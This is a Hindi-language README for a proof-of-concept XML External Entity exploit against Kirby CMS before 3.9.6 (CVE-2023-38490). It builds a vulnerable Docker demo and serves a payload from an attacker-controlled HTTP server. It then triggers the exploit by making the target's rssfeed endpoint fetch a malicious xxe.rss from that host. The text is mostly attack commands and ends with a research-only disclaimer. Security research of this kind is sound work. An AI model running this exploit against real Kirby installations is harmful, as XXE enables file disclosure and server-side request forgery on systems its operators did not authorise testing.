
Kirby < 3.9.6 XML External Entity शोषण
Kirby < 3.9.6 XML External Entity
CVE-2023-38490 / GHSA-q386-w6fg-gmgp के लिए शोषण।
कमजोर डेमो ऐप को बनाएँ और चलाएँ:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
डेमो पेलोड को सर्व करें:
नोट: एक बाइंड पता चुनें जिसे डॉकर कंटेनर एक्सेस कर सके।
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
शोषण को ट्रिगर करें:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
कमजोर फंक्शन किर्बी कोर में मौजूद है लेकिन किर्बी कोर, किर्बी स्टार्टरकिट, या किर्बी प्लेनकिट में डिफ़ॉल्ट रूप से उपयोग नहीं किया जाता है। इसका मतलब है कि डिफ़ॉल्ट कॉन्फ़िगरेशन पर यह कमजोरी आपको प्रभावित नहीं करेगी लेकिन कस्टम डेवलपमेंट या प्रभावित टूलकिट का उपयोग करने वाले प्लगइन को स्थापित करने से इसे शामिल किया जा सकता है।
ACCEIS किसी भी अवैध गतिविधि को बढ़ावा या प्रोत्साहित नहीं करता है, इस रिपॉजिटरी द्वारा प्रदान की गई सभी सामग्री केवल अनुसंधान, शैक्षिक और खतरे का पता लगाने के उद्देश्य के लिए है।